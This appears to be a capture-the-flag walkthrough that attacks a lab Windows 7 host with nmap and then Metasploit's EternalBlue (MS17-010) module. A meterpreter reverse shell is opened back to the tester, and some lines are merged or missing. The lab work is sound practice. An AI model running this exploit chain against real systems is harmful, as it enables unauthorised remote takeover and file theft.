Phase 1: Recon

Phase 2: Scanning

nmap -A -T4 10.10.10.40
Nmap scan report for 10.10.10.40
Host is up (0.075s latency).
Not shown: 65526 closed ports
microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/8%OT=135%CT=1%CU=43810%PV=Y%DS=2%DC=T%G=Y%TM=5EB5D73
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=FE%TI=I%CI=I%II=I%SS=S%TS=7)
OS:OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54D
OS:NW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
OS:ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -18m05s, deviation: 34m36s, median: 1m52s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-05-08T23:05:29+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-05-08T22:05:28
|_ start_date: 2020-05-08T22:02:01
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 75.10 ms 10.10.14.1
2 75.33 ms 10.10.10.40

Phase 3: Exploitation

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.10.10.40msf5 auxiliary(scanner/smb/smb_ms17_010) > run[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - 
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

Phase 4: Gaining Access/Maintaining access

cd   - Change directorydownload - Download a file or directoryupload - Upload a file or directorygetuid  - Get the user that the server is running assysinfo - Gets information about the remote system, such as OSshell - Drop into a system command shell

Phase 5: Covering tracks

meterpreter > exit
[*] Shutting down Meterpreter...
[*] 10.10.10.40 - Meterpreter session 2 closed. Reason: User exit
msf5 exploit(windows/smb/ms17_010_eternalblue) >